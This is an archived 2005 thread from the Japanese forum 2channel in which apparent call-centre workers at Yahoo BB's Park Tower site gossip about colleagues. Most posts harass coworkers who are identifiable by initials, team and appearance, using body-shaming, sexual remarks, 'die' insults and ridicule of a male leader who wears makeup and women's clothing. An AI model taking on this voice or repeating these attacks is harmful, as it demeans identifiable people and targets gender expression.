5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

YBB Pたわー限定8

1 :FROM名無しさan:2005/05/24(火) 14:13:07
YBBサポセンスレッド(Pたわー限定!!)
http://pc.2ch.net/test/read.cgi/isp/1014485607/

YBBサポセンPたわー限定2
http://pc3.2ch.net/test/read.cgi/isp/1023940916/

YBBサポセンPたわー限定3
http://pc3.2ch.net/test/read.cgi/isp/1034098041/

YBBサポセンPたわー限定4
http://pc3.2ch.net/test/read.cgi/isp/1040668756/

YBBサポセンPたわー限定5
http://pc4.2ch.net/test/read.cgi/isp/1051136465/

YBBサポセンPたわー限定6
http://pc4.2ch.net/test/read.cgi/isp/1066770090/


YBBサポセンPたわー限定7
http://pc8.2ch.net/test/read.cgi/isp/1080719705/l50

2 :FROM名無しさan:2005/05/24(火) 14:13:33
>>1>>3-1000
氏ね

3 :FROM名無しさan:2005/05/24(火) 14:13:49
        ウズウズ…

         =≡=  ∧_∧
          / \ <`∀´ > /    ←祭り待ち中
        〆     ⊂    つ∈≡∋
         ||  γ ⌒ヽヽコ.ノ.  .||
         || .|   |:::|レ〓  ||
        ./|\人 _.ノノ _||_.  /|\

4 :FROM名無しさan:2005/05/24(火) 14:14:24
>>2
氏ね、カス

5 :FROM名無しさan:2005/05/24(火) 14:16:05


オマエは生きる価値も無い腐ったブタだよ!!

6 :小顔でも下半身デブのお祭りねえちゃん:2005/05/24(火) 15:24:19
小顔でも下半身デブのお祭りねえちゃん

7 :FROM名無しさan:2005/05/24(火) 21:39:28
保守

8 :FROM名無しさan:2005/05/25(水) 00:16:05
顔デカくて、態度デカくて、オッパイ極貧で、
下半身デブで、チビで、男としか話をしなくて、
しかも複数の沢山の男の体をブースで触りまくって調子に乗っていて、
気に入らない男には性格キツくて、ゴミ同然の至上最低な女SVなんているのかな?
例えばモデムチームの一番奥のオペラシティ側のエリアとかに、そんな女SVとかっているのかな?
私には分からないけど。


9 :サ変:2005/05/25(水) 01:03:08
最近他部署からこちらに移ってきて、いつもたて縞のワイシャツを着ていて、茶髪眼鏡で、そのSV、タメ口でいろいろ馴れ馴れしく指図してくるわりには何も分かっていない馬鹿ぶりを晒しているなんてことないよね?

10 :FROM名無しさan:2005/05/25(水) 01:37:51
私が言っているのは、サ変の女SVのことではないの。
モデムチームの一番奥の(オペラシティー側)窓ガラス近辺に、
8で書いたようなゴミ以下の臭い女SVっているのかな?ってこと。

11 :FROM名無しさan:2005/05/25(水) 02:25:03
>>9
いるよ〜そいつ。まじでそいついらね。
うるせ。
調子こきまくり。いらね。あの勘違いちび男。

12 :FROM名無しさan:2005/05/25(水) 06:01:48
前スレの>>973も、眼鏡ハゲにムカついてるクチかな?
まあ、あれにムカつかない奴の方が珍しいか…

美人LDRは時々しか見掛けないから、見つけにくいかも?
昼の研修生の群れが窓際のPCを見に来たら、チェックしてみてよ
あと、美人とかじゃないけどTuさんも親切で優しくて萌え


13 :FROM名無しさan:2005/05/25(水) 09:26:57
>12 出る「くい」は打たれるってか?w


14 :FROM名無しさan:2005/05/25(水) 11:20:19
>>13=眼鏡ハゲ本人必死www

15 :FROM名無しさan:2005/05/25(水) 11:48:44
そろそろ「ちゅうげん」の季節ですね

16 :FROM名無しさan:2005/05/25(水) 15:01:04
>>11
わかりそーでわからない
イニシャルでおせーて

17 :FROM名無しさan:2005/05/25(水) 15:16:29
俺は8と10の女性SVのイニシャルを尻たい

18 :FROM名無しさan:2005/05/25(水) 15:37:59
>>16
(一)最近他部署から移ってきた模様
(二)身分は一応S∨
(三)態度だけは何年もここの部署にいる感じがするほどデカイ
(四)茶髪
(五)いつもほとんど縦縞のシャツ着用
(六)いきなりタメ。礼儀とか場の雰囲気が読めない
(七)業務内容もしらない
(八)従って立たれるだけ邪魔
(九)自分がエスカ受けて分からないことがあると他のCSRに聞きに走るという恐るべき当事者能力のなさ
(十)眼鏡
(十一)チビ


19 :FROM名無しさan:2005/05/25(水) 17:56:04
>>11,18
勘違いは藻前だ。藻前らを粛正しに行ってんだよw

20 :FROM名無しさan:2005/05/25(水) 18:02:50
本人降臨w

21 :FROM名無しさan:2005/05/25(水) 20:40:43
板移転した途端に本人降臨祭りだなw

22 :FROM名無しさan:2005/05/25(水) 21:25:11
本人キター―――(・∀・)――― …!!! 勘違い茶髪チビキター―――(・∀・)――― …

23 :FROM名無しさan:2005/05/25(水) 22:56:20
>>13
出る「歯」は打たれるってか?
うまいこと言ったもんだなw

24 :FROM名無しさan:2005/05/25(水) 23:09:31
勘違い茶髪チビを粛正粛正!

25 :FROM名無しさan:2005/05/25(水) 23:11:12
祭り∩(゚∀゚∩)age

26 :FROM名無しさan:2005/05/25(水) 23:17:18
茶髪もチビもタメ口もワッショイワッショイワッショイ〜♪
そ〜れそれそれそれお祭りだ〜♪

27 :FROM名無しさan:2005/05/26(木) 01:16:24
勘違い茶髪チビまた勘違いw
CSRじゃなくSVを粛正しにきたんでしょーがw

28 :FROM名無しさan:2005/05/26(木) 02:10:30
モデムとしてはどうでも良いけど、下手な転送なくなりゃ良いや。
無茶なインターセプトとか無茶なインターセプトとか、無茶な(ry

CSだかSCだか知らんけど、そっちに光ゲンジみたいなの居ない?
気になってしょうがない。いろんな意味でw

29 :FROM名無しさan:2005/05/26(木) 09:35:56
光ゲンジだけぢゃアイマイだな。特徴きぼん

30 :FROM名無しさan:2005/05/26(木) 11:22:11
それウチにいます。
顔だけでなく服も含めて光ゲンジみたいな奴でしょ?
20年くらい前ならカッコイイと思われたかもしれないけど、今の時代では正直キモいです。


それよりも、モデムだかISPだか知らんけど、そっちにベルバラみたいなの居ない?
気になってしょうがない。いろんな意味でw

31 :FROM名無しさan:2005/05/26(木) 11:37:54
>>30 どこチームですか? cs?sc? もしかしてピアスしている奴?

32 :FROM名無しさan:2005/05/26(木) 11:46:27
sageとこうよ。
光ゲンジ、あぁ、何となくわかる気がするな。
鉢巻き巻いてほしいw

>>30
いるよ。ベルばら。モデムにね。気になって当たり前だと思われw
見た目すごくゲイっぽいけど、ストレート。
すごく軽やかにエスカに駆けつけてくれるよ。

CSかSCに、名古屋嬢居るでしょ?すっごい縦巻きの。スゴいよね。


33 :FROM名無しさan:2005/05/26(木) 12:08:18
顔面が茜色したヤンキっぽい女か?名は体を現すとはよくいったもんだねぇ。

34 :FROM名無しさan:2005/05/26(木) 13:07:10
>見た目すごくゲイっぽいけど、ストレート。
すごく軽やかにエスカに駆けつけてくれるよ。

奴はオカマだよ。
顔はかなり男臭い典型的な野郎顔でブサイクで声も低いのに、
女装してっから似合わずにキモイぜ。
軽やかにエスカに走ってくるのはいいけどさ、完全に受け入れ不可。
「お前は来ないでくれ!」って思うし、質問するのにいつも抵抗あって嫌だね。
人の上に立つ仕事なんだからさ、女装とかしないで、
仕事なんだから俺ら受電者が抵抗を感じない普通の服を着てくんねぇかな。
プライベートでやってくれよ変態オカマプレーは。




35 :ビザカード:2005/05/26(木) 13:39:34
光ゲンジの男もかなり図に乗っててウザいんだよね。


36 :FROM名無しさan:2005/05/26(木) 15:20:59
そんなに嫌なら直接言いに来いよ、ネット番長。
それとも足が震えていけない、ってかw

37 :FROM名無しさan:2005/05/26(木) 16:39:22
↑直接言われる前に自分で気付けタコ

38 :FROM名無しさan:2005/05/26(木) 16:58:09
36=ネットでしか大口叩けないカスw

39 :FROM名無しさan:2005/05/26(木) 18:34:47
38
さすが本人!
降臨した甲斐ありって感じ?

40 :FROM名無しさan:2005/05/26(木) 19:48:11
直接言われる前に自分で気付けタコ

41 :FROM名無しさan:2005/05/26(木) 20:58:42
>>34
モデムのあのオカマLDRはキツイですね。
アイシャドーしてるときもあるし、服の下から女物の下着が見えているときもあります。
体のラインは細くても、顔がマッチョ系のイカツイ男顔ですし、
ぜんぜん女装が似合いませんし、見てて痛々しくて吐きそうになります。
たしかにLDRとしても会社に着てくる服ではないですよね。
では失礼します。

42 :FROM名無しさan:2005/05/26(木) 23:26:31
フロムAの107ページ、俺のオキニのリーダーだw

43 :FROM名無しさan:2005/05/27(金) 02:04:08
最近朝はモデムの近くで電話取ってんだけど、そのベルバラの人も含み、テックは見た目からしてヤバイ人大杉。

太ってるのに肩やら足を露出しまくってるキショ女や、顔が明らかに障害者(クスリやってる?)な男。


ていうか最近手を挙げても誰も来てくれない。
というよりも自分以外にも5人くらいは同時に手を挙げてるし。

せめて走ってきてよ。

44 :FROM名無しさan:2005/05/27(金) 02:07:24
>>べるばら
一発でわかたw
対応早いし柔軟だしはっきり喋るし、あのひとにエスカして困ったことはない。
そんな文句言うほど変な服装してるの?
レース付きのシャツは見たことある、その他はあんまり印象ない。

他の人よりも聞いたことに答えてくれるから便利なんだけど。
質問しても一方的に喋って質問させてくれない人とかのが困る。

45 :FROM名無しさan:2005/05/27(金) 02:32:02
テックには!ちりぢりというか、ぼさぼさの長髪で一部ハゲかかっているオサーンがいるが、彼は??

46 :FROM名無しさan:2005/05/27(金) 02:43:39
>45

メガネかけてる?
男?
CSR?それともSVやLDR?

47 :nanananana:2005/05/27(金) 02:51:39
>最近朝はモデムの近くで電話取ってんだけど、そのベルバラの人も含み、テックは見た目からしてヤバイ人大杉。

ベルバラは、やばーいですね。
男なのに化粧しててフリフリしたレースの女物の服を着てて気持ち悪いバケモノみたい。
エスカには親切に答えてくれるけど高圧的なことも結構あり頭に来ますですね。
そして不正解も多いですね。

>太ってるのに肩やら足を露出しまくってるキショ女

OJTトレーナーにいますね。
あれだけ丸々と太ってて露出しまくっているの度胸は大したものです。
しかし見せられる側の気持ちも考えて欲しいのですよ。
丸々と太った男性がタンクトップ着ているのを見るのは誰でも嫌でしょうに?

48 :FROM名無しさan:2005/05/27(金) 03:22:44
>47
その内容からするとあなたは・・・。私怨はいいから寝ろ
そんなにいろんな人の見た目が気になる性格のに、なぜPで働く?
ストレスたまるばかりだろう かわいそうだけど 別のとこにいったほうがいいよ

49 :FROM名無しさan:2005/05/27(金) 03:27:09
48
本人降臨で必死だな

50 :FROM名無しさan:2005/05/27(金) 03:27:49
勘違い茶髪SVさん、そうカリカリしないでくださいよ。

51 :FROM名無しさan:2005/05/27(金) 05:52:05
茶髪SVさんがわかんないんだよーヽ(`Д´)ノウワァン

52 :FROM名無しさan:2005/05/27(金) 20:01:57
>>48
その内容からするとあなたは・・・。私怨はいいから寝ろ
そんなにカリカリする性格のに、なぜPで働く?
ストレスたまるばかりだろう かわいそうだけど 別のとこにいったほうがいいよ

君に性格がどーこー言われる筋合いは無いなぁ。



53 :FROM名無しさan:2005/05/27(金) 20:39:29
モデムチームです。AVの美竹涼子そっくりの女の子がいる。お近づきになりたい〜♪


54 :FROM名無しさan:2005/05/27(金) 21:54:45
モデムチーム・・・懐かしいなあ。
一番奥の、窓がチラ見できるいい席なんだよね。
うん、ここのバイト楽しかった。
周りが個性的な人ばっかりだったw

55 :FROM名無しさan:2005/05/27(金) 21:56:37
もう年末に辞めたけど茶髪SV縦縞シャツにはお世話になりました!!
本当にありがとうございます。
ご希望(シャンプーしてくれる?美容師だっけ?)の女の子いたら連絡します!笑っ
応援してるので身体に気をつけて頑張って下さいねー☆

56 :FROM名無しさan:2005/05/27(金) 22:05:02
その茶髪SV縦縞シャツはドキュソ杉。さっさとどっかに飛ばせよあの役立たず。

57 :FROM名無しさan:2005/05/27(金) 22:07:03
>>55
その人って黒髪だったこともあった?

58 :FROM名無しさan:2005/05/27(金) 23:16:19
無い

59 :FROM名無しさan:2005/05/27(金) 23:29:11
おまいら、二三日の付き合いでウチの殿に軽々しく文句言ってんぢゃねーよ。
サクっとやっつけて、早く帰ってきてね。
みんな待ってるよ、茶髪ちゃん☆

60 :FROM名無しさan:2005/05/27(金) 23:38:51
たしか必死になって茶髪チビを擁護してるのは本人なんですよね?

61 :FROM名無しさan:2005/05/27(金) 23:41:05
何がウチの殿だ。お前は何なんだ?
あの勘違いSVの親衛隊か? 二、三日どころか大分いるが悪評しきりだぞ。勘違いのうえ調子こきまくりでうざい、いらない、どっかに処理しろや、ってな。みんなからひそひそ言われている。
知らないはノー天気な本人だけなんだよw

62 :FROM名無しさan:2005/05/27(金) 23:44:14
なんだ本人降臨のうえ自作自演か?(笑)
みえみえなんだよな。
まあ、馬鹿さ加減を存分に披露してくれたまえよ、茶髪チビ眼鏡縦縞勘違いクン♪

63 :もでむ:2005/05/27(金) 23:45:01
>>53
VTは?

64 :FROM名無しさan:2005/05/27(金) 23:48:32
しらん。トレーナーやってる。小顔で超かわいい

65 :FROM名無しさan:2005/05/27(金) 23:55:21
本人降臨キター━━(゚∀゚)━━━勘違い茶髪チビ野郎キター、自作自演乙!!!!

66 :FROM名無しさan:2005/05/28(土) 00:13:20
>>61
うるせーなCS!ウチの殿はお手伝いに行ってやってんだよ!
殿〜早くTechに戻ってきてね☆


67 :FROM名無しさan:2005/05/28(土) 00:16:51
と、本人が第三者になりすまして自己弁護の書き込みに必死です

68 :FROM名無しさan:2005/05/28(土) 00:22:11
>>67
あなた、ヒマだね。

69 :FROM名無しさan:2005/05/28(土) 00:29:25
あんたこそtech系のどこチーム出身のSVかしらんが、CS系に応援にきたところで足を引っ張るだけで余計忙しくなるからさっさと古巣に帰りなよ。
勘違い「ウチの殿」とやらよ。

70 :FROM名無しさan:2005/05/28(土) 00:29:47
>>68
「だって、金曜の夜なのに彼女もいないんだもん。」

お前、あたしの隣に座わんなよ!!
キショイから。


71 :FROM名無しさan:2005/05/28(土) 00:37:39
こんどはネカマです

72 :FROM名無しさan:2005/05/28(土) 00:38:37
>>70
あっ、今は彼女と一緒に見てるから。
ご心配なく。

73 :FROM名無しさan:2005/05/28(土) 00:42:46
>>70
座わんねーよ!デブ

俺は彼女いるぜ〜。おまえと違って!

74 :FROM名無しさan:2005/05/28(土) 00:47:39
茶髪勘違いの肉便器女が暴れているスレはここですか?

75 :FROM名無しさan:2005/05/28(土) 00:49:50
>>72-73
モテナイ君が、二人以上釣れました!(笑)

76 :FROM名無しさan:2005/05/28(土) 00:51:39
>>75
あなたも「形式上」SVなんですからそんなこと言っちゃダメですよ。だいいちあなたも同類でしょ。

77 :FROM名無しさan:2005/05/28(土) 00:57:36
>>76
おれSVじゃないけど。

78 :CS:2005/05/28(土) 00:58:48
>>75
わたしCSなんですけど、周りの男の子はカッコイー子が多いですよ〜。
毎日仕事に行くのが楽しみです!



79 :FROM名無しさan:2005/05/28(土) 01:02:12
<<78
おまえ30歳だな!

80 :sage:2005/05/28(土) 01:20:13
>>79
さすがCS、アンカーのつけ方もわからんヴぁかですね。

81 :FROM名無しさan:2005/05/28(土) 01:45:25
M・Iさん(・∀・)モエッ

82 :FROM名無しさan:2005/05/28(土) 02:57:02
殿〜♪

83 :FROM名無しさan:2005/05/28(土) 10:12:24
殿=阿呆=アホー=Yahoo!=勘違い=茶髪=眼鏡=チビ=役立たず=早く消えろ

84 :FROM名無しさan:2005/05/28(土) 10:16:41
人に言う前にまずお前から消えろ

85 :FROM名無しさan:2005/05/28(土) 10:55:12
>>84
プッ

86 :FROM名無しさan:2005/05/28(土) 11:20:26
>>85
プッ

87 :FROM名無しさan:2005/05/28(土) 11:36:01
殿〜♪粗大ゴミになっているから早くどっか消えてね〜♪

88 :FROM名無しさan:2005/05/28(土) 12:39:54
>>86
プッ


89 :FROM名無しさan:2005/05/28(土) 12:53:44
>>81
M・Iさんって誰?

90 :FROM名無しさan:2005/05/28(土) 17:28:53
殿ガンガレ

91 :喜屋武背流:2005/05/28(土) 23:39:12
も〜っ。むかつく!!
-_-^ 顔も声もロリっぽいCC喪I@HB態度ムカつくんだYO!!

92 :FROM名無しさan:2005/05/29(日) 00:40:07
ロリーターフェイスあげ!

93 :FROM名無しさan:2005/05/29(日) 02:26:35
>47
以後気を付けます。

94 :FROM名無しさan:2005/05/29(日) 20:10:28
>93 以後気を付けます。

反省していることは良いが、
お前は不細工なオカマのベルバラ?
それとも不細工なOJT露出女?
どっち?



95 :FROM名無しさan:2005/05/29(日) 20:31:03
往年の武田真治を自認する中性(バイセクシャル)路線ですか?


96 :93:2005/05/29(日) 21:36:00
失礼☆
不細工なOJT露出女の方です☆
あなたはどなた??

97 :思惟絵巣:2005/05/29(日) 21:44:43
>91あいつはわかってないから態度悪いんだよ〜。
気にすんなー。デブ!って言ってやれ〜!
VT3のK田も個人的にキライだった。
N棟行って幸せじゃぁ〜☆

98 :FROM名無しさan:2005/05/29(日) 22:18:38
Pタワーってパークタワーのことですか?このバイトって髪の色とか何も言われませんか?明日面接に行きます

99 :喜屋武背流:2005/05/29(日) 22:25:50
K田の似合わないおかっぱ頭見てひそかに笑いをかみ殺していた私は逝ってよしですか?


100 :サ行変格活用:2005/05/29(日) 22:50:11
でもN棟のLDRたちにも嫌なのはいるし、ちょくちょくS棟に来るからねえ。
とりあえず募〜図頭の怪人みたいな男LDRなんとかしてくれ。横着で有名らしいけど。

101 :FROM名無しさan:2005/05/30(月) 12:31:24
今面接でした
ロールプレイングテストテストよくできてますねってゆわれました!
まじで受かってますように( ̄人 ̄)神様〜〜〜〜

102 :FROM名無しさan:2005/05/30(月) 14:03:27
↑。だいたいOJT中に同期の半分以上がいなくなるよ・・ま、ガンガレ!

103 :FROM名無しさan:2005/05/30(月) 14:20:24
OJTの講師はあのデブALDRか?

104 :真夜中のダンディー:2005/05/30(月) 19:37:07
うちのチームの一番偉いS∨さん、すげぇ美人!

105 :FROM名無しさan:2005/05/30(月) 22:02:42
私がいたときの坊主頭の人っていったらあの人しかいないんだけど
確かデブじゃなかったよなあ・・・別人なのかな。
ちなみに新宿2丁目の「あっぱれ」って
オカマバーのママに似てる人なんだけど。

106 :FROM名無しさan:2005/05/30(月) 22:47:47
プロレスラーみたいなLDR、朝うるさくてうぜぇ。

107 :FROM名無しさan:2005/05/30(月) 23:40:49
借金は棒倒し

108 :FROM名無しさan:2005/05/31(火) 00:07:11
殿〜♪勘違いとかなんとか言われても気にしないでね〜♪
勘違いこそバカ殿の持ち味よ〜〜♪粗大ゴミ扱いされてもキニシナイキニシナイ!!
粗大ゴミ、産業廃棄物はウチで引き取るから〜♪

109 :FROM名無しさan:2005/05/31(火) 02:09:25
>「あっぱれ」ってオカマバーのママに似てる人なんだけど。

マニアックすぎて分からねぇ。
ネットで画像を探したけど見当たらねぇ。
どっかに画像ない?
メチャ見てぇ。


110 :FROM名無しさan:2005/05/31(火) 02:47:02
プロレスラーみたいなLDR>肉団子?共有ブースの意味わかってんのか?
今日Cにも来てたみたい。

111 :FROM名無しさan:2005/05/31(火) 12:25:31
>「あっぱれ」ってオカマバーのママに似てる人なんだけど。

顔面全体がサボテンみたいな関西弁坊主のこと? そのオカマバー自体は全然知らんが。

112 :FROM名無しさan:2005/05/31(火) 12:35:46
OJTってなんですか?
そんなに辛い仕事なんですか?
さっき採用の電話来ました!よろしくおねがいします!!

113 :FROM名無しさan:2005/05/31(火) 12:49:57
そんな気背い込まなくても大丈夫ですよ。一ヶ月もすればいずれ・・・

114 :FROM名無しさan:2005/05/31(火) 22:44:31
なんだあの防犯カメラみたいなのはーーーーー!!!
なんのためにつけられたんだ!!!

115 :右のポッケ〜♪:2005/05/31(火) 23:50:24
カメラで全部監視するなんて陰険な連中だよ。信用してないっていってるようなものじゃないの。
自動ドアはしょっちゅうぶっこわれるし。

116 :FROM名無しさan:2005/06/01(水) 00:49:38
信用できるわきゃねーだろ
皆DQNなんだから

117 :FROM名無しさan:2005/06/01(水) 01:00:26
わかりました!わかりましたから、そんなにいきりたたないでくださいよmarketさん

118 :FROM名無しさan:2005/06/01(水) 03:08:32
15分前出勤なんてしてられるか!

119 :FROM名無しさan:2005/06/01(水) 10:09:19
15分前?何のことですか?

120 :FROM名無しさan:2005/06/01(水) 22:29:01
一番窓際、15分前出勤初日に人いなすぎてわらわれまくり・・。
ゲート壊れすぎ!カメラまじ感じわるい!


121 :FROM名無しさan:2005/06/01(水) 23:49:15
A〜ALDR態度極悪だわYO!!

122 :FROM名無しさan:2005/06/02(木) 00:29:29
以上、キモヲタヲカマの書き込みでしたw

123 :FROM名無しさan:2005/06/03(金) 01:08:55
@HBよ、あんたの指示通りにやるとなぜかいつも差し戻しをくらうんだよ。
あと、その生意気な口の利き方何とかしろ。こんな女をLDRにしたのだれだよ。なんか特殊な接待でもしたの?

124 :FROM名無しさan:2005/06/03(金) 02:18:52
@HBって誰のことか分からん。
もう少しヒント!

125 :FROM名無しさan:2005/06/03(金) 03:13:06
頭からたくさんチ○毛が生えてるモデムのメガネSVはアニメキャラのウソップに似てる。そして顔を見てると気分が悪くなる

126 :FROM名無しさan:2005/06/03(金) 03:47:39
あいつは自分で渋くてもてるって思ってるけど・・・
実は私の周りの友達はみんなきもいって言ってる。
てか、実際かなり嫌われてるでしょ!?

127 :FROM名無しさan:2005/06/03(金) 05:24:25
そのSVはモデムチーム?
もしモデムだとしたら、VTはどこ?

128 :FROM名無しさan:2005/06/03(金) 16:14:16
 ∧_∧
( ;´∀`) ちんこ勃ってきた。
人 Y /
( ヽ し
(_)_)


129 :FROM名無しさan:2005/06/04(土) 02:42:21
壕籠さん息が生臭杉

130 :FROM名無しさan:2005/06/04(土) 04:32:00
@HBはLDRの中でも友達いなくない?
みんな上辺だけでつきあってる漢字!
k田のおばはんパーマかわいい〜☆

131 :FROM名無しさan:2005/06/04(土) 10:55:41
それが@HBクオリティ。人によって態度をかえたりするやり方にはS∨もとっくに気付き、内心あきれている。

132 :FROM名無しさan:2005/06/04(土) 14:47:51
>130
K田って何歳なの?


133 :FROM名無しさan:2005/06/04(土) 17:22:54
>>127



134 :FROM名無しさan:2005/06/04(土) 21:47:28
>>109
見たいなら探して行ってみ。
新宿なんだからすぐでしょ。
人のいいママさんだよ。私は大好き。

>>111
サボテンどころか、ビニールボールみたいにつるつるだったし
流暢な標準語で私の質問に答えてくれた気がする。
私の記憶が確かなら。

135 :FROM名無しさan:2005/06/04(土) 23:23:00
そういう怪しげなバーに出入りするあなたには何か格別趣味を持ちあわせているんですか?

136 :FROM名無しさan:2005/06/05(日) 12:36:53
>134 見たいなら探して行ってみ。新宿なんだからすぐでしょ。

何で俺がそんなオカマバーに時間と金かけて行かねばならんの?
お前がパークの32階までママを連れて来ればいいだろ!


137 :FROM名無しさan:2005/06/05(日) 12:54:06
それか写真を撮ってどっかにウプすればいい。

ところでサボテン頭の横着でやる気が無くて無愛想なゲイ坊主って何のことかしら?

138 :FROM名無しさan:2005/06/05(日) 17:54:45
都資産、お疲れ様でした。

139 :FROM名無しさan:2005/06/05(日) 23:49:36
>132 う〜む、不明。
25ぐらい?彼氏いなそうー!

140 :FROM名無しさan:2005/06/07(火) 02:41:00
満月みたいな顔面していたT岐さん元気ですか?

141 :FROM名無しさan:2005/06/07(火) 12:34:36
T岐さんは、月に召されました。
ウソです。
今はパークタワー勤務じゃないからいないよ。

142 :FROM名無しさan:2005/06/07(火) 20:50:47
>140
爆乳の人?

143 :FROM名無しさan:2005/06/07(火) 21:37:18
聖なるSVがムカつくんですが、何とかなりませんか?

144 :FROM名無しさan:2005/06/07(火) 22:13:37
縦縞シャツ勘違い茶髪眼鏡小男S∨のほうが、はるかに、始末が悪いです。

145 :FROM名無しさan:2005/06/08(水) 00:11:08
モデムのべるばら・・・なるほど、しかし俺は心の中で彼のことを「高見沢」と呼んでいるよ。

146 :FROM名無しさan:2005/06/08(水) 00:18:17
>>145
…同じく。最初見た時から心の中では高見沢と呼んでいる。

147 :FROM名無しさan:2005/06/08(水) 00:28:45
高見沢か、なるほど。ところで、上にあった、化粧しているという噂は本当ですか?

148 :FROM名無しさan:2005/06/08(水) 02:18:32
俺は心の中で叶恭子と呼んでいる。

149 :FROM名無しさan:2005/06/08(水) 02:33:45
全然似てないじゃねーかよ。とまじレス

150 :FROM名無しさan:2005/06/08(水) 14:00:37
キモヲタのベルバラはアイシャドーとかマスカラとかしてるよ。
あのブサイク顔に化粧してっからよ〜、マジ化け物なんだよ〜。
ちっちゃなポーチを手に持って便所の個室に入ってくのを何度も見たけど、
あの中にゃ化粧道具が入っているとの噂。
キモッ!氏ね!

151 :FROM名無しさan:2005/06/08(水) 17:27:20
いいじゃないか。
あれはあれで見てて楽しい。
なかなか似合っていると思う。
他部署で、関わる事が無いからかもだが。

152 :FROM名無しさan:2005/06/08(水) 18:14:53
光ゲンジのやつ勘違いでキモすぎ

153 :FROM名無しさan:2005/06/08(水) 22:12:07
やっと本人の降臨だ!!!
楽しいかどうかは本人が決めるのではなく、周りの私らが決めること。
あの人がオカマのかっこうするなんて相当に気持ち悪く不気味だから、
見る人に気持ちにもなって欲しい。

154 :FROM名無しさan:2005/06/08(水) 23:29:33
ドブガエル♀と男メカケ@19♂が仲良さそうに歩いてたケド、キモカップル杉

155 :FROM名無しさan:2005/06/09(木) 01:44:40
ドブガエルってcsのLDR?


156 :FROM名無しさan:2005/06/09(木) 02:06:58
>>150,153
さすがにこの人の話題となると喰い付くね〜。
何か恨みでもあるようだけど、FBでも受けたかい?(w

滅多に怒らない人なんだけどねぇ〜。



157 :FROM名無しさan:2005/06/09(木) 02:25:08
またまた本人降臨!

158 :151:2005/06/09(木) 06:44:04
うおお。本人に決め付けられた。
困ったな。
なんかちょっと変わった人見ると楽しいんだけどな。
それだけ。

159 :FROM名無しさan:2005/06/09(木) 11:29:57
>>158
誇張した悪口に乗らない人は全部本人になっちゃうみたいですよ。

160 :FROM名無しさan:2005/06/09(木) 16:26:48
でも人知れずのベルバラならまだしも、
オカマの服を着て化粧をしている男が、CSRの上に立つ役職に就くのはどうかと思うぞなもし。
こんなブ男のド変態をクライアントが見たら気持ち悪がる前に、俺ら下請け会社の常識を不審に思うぞなもし。

161 :FROM名無しさan:2005/06/09(木) 16:52:25
ISPの窓際族の処理を何とかしてください。

162 :FROM名無しさan:2005/06/09(木) 19:53:57
ベルバラの話題飽きた。ほかのにしてくれ。

163 :FROM名無しさan:2005/06/09(木) 21:26:35
よし、じゃお前の話題をしよう。

164 :FROM名無しさan:2005/06/10(金) 04:47:51
カエルってゆうか、あれは危機麒麟だな

165 :FROM名無しさan:2005/06/10(金) 04:59:26
IDが無い板に移った途端に私怨マミレの香ばしいスレになりました
恥ずかしいよ、ここで叩いてる奴ら

166 :FROM名無しさan:2005/06/10(金) 20:55:32
今度はスパー過疎板の通信技術板にでも立てるか?
リモホ丸出しだぞ。

167 :FROM名無しさan:2005/06/11(土) 10:33:53
本当に悪口ばっかで嫌になる
誰か褒めてみたら?
嫌な人ばかりじゃないし、いい人沢山いるよ

168 :FROM名無しさan:2005/06/12(日) 00:21:58
DQNが自分を棚上げしてDQNとののしるスレだから移動しても仕方ない罠

169 :FROM名無しさan:2005/06/12(日) 00:36:45
と茶髪チビS∨が嘆いてます

170 :キャンセル:2005/06/12(日) 03:52:04
あっ!

171 :FROM名無しさan:2005/06/12(日) 09:07:29
       彡川三三三ミ
       川川 ::::::⌒ ⌒ヽ  
      川川::::::::ー◎-◎-)
      川(6|::::::::  ( 。。))   
    ._川川;;;::∴ ノ  3  ノ  
  /;;;:::::::::::::::\_;;;;;;;;;;;;;;;;ノ    
 /::::  /::::::::::::    |::::|
(:::::::: (ξ::  ・ ノ::・/:::|
 \::::: \:::::::   (::: |
 /:::\::::: \:::    ヽ|
/::::   \::::: \::: ヽ )
|:::      \::   ̄ ̄⊇)__  〜
|:::::::      \;;;;;;;;;;;(__(;;;・)  〜 
\::::::::::   ξ(;;; );; )      〜
  \::::::::::::    ) )
    ):::::   //
   /::::::::: //
 /:::::  (_(_
(;;;;;;;;;;;__っ)))つ

172 :FROM名無しさan:2005/06/13(月) 23:09:35
もう辞めたい

173 :FROM名無しさan:2005/06/13(月) 23:47:18
SCTに荷物を預けたまま忘れてきてしまったんですが大丈夫でしょうか?

174 :FROM名無しさan:2005/06/14(火) 01:09:36
話によると、制服が・・・

175 :FROM名無しさan:2005/06/14(火) 01:20:42
何日休むと勤怠に影響でんの?ダラダラしたいよー

176 :FROM名無しさan:2005/06/14(火) 13:56:37
バカ部署CS

177 :FROM名無しさan:2005/06/14(火) 13:59:34
CSのOJTにいるACSRの黒Tのボーズ、どんだけ偉そうだよ!?
ESC時は走れ! カスが!

178 :FROM名無しさan:2005/06/14(火) 17:43:20
つ〇だLDいつも親切で優しくて大好きです
交際してください

179 :FROM名無しさan:2005/06/14(火) 21:32:23
バカ部署CS

180 :FROM名無しさan:2005/06/15(水) 01:53:29
殿=阿呆=アホー=Yahoo!=勘違い=茶髪=眼鏡=チビ=役立たず=早く消えろ


181 :FROM名無しさan:2005/06/15(水) 10:24:40

了解!

182 :FROM名無しさan:2005/06/15(水) 11:18:54
デブ眼鏡坊主消えて無くなれ!おまえうざい。どっか行け!このデブ豚!

183 :FROM名無しさan:2005/06/15(水) 23:03:56
信頼できるLDR減ったな・・・

184 :FROM名無しさan:2005/06/16(木) 00:16:26
@HB信頼不能

185 :FROM名無しさan:2005/06/16(木) 11:53:16
馬鹿部署CS

186 :FROM名無しさan:2005/06/16(木) 12:15:29
のドブガエル

187 :FROM名無しさan:2005/06/16(木) 22:06:57
CSのドブガエルってだれ?

188 :FROM名無しさan:2005/06/17(金) 03:00:50
樹木希林似のLDRだろ 自分ではコケティッシュなつもりで何か気取って喋っているが似合わなすぎ

189 :FROM名無しさan:2005/06/17(金) 20:59:47
おい、ハゲコ!
やる気ないならエスカしても来なくていいぞ
うざそうに適当なこと言って帰るなら来ない方がましなんだよ
分かるか?

190 :FROM名無しさan:2005/06/17(金) 21:52:19
それってF本?
あれはひどいよね。いくら手上げてもエスカにも来ないでくっちゃべってるし、
来たと思ったら無責任なことしか言わず糞の役にも立たないし。
しかもかなりのブサイクのクセにそれに気づかずすかしたしゃべり方するもんだから死ぬほどきもい。
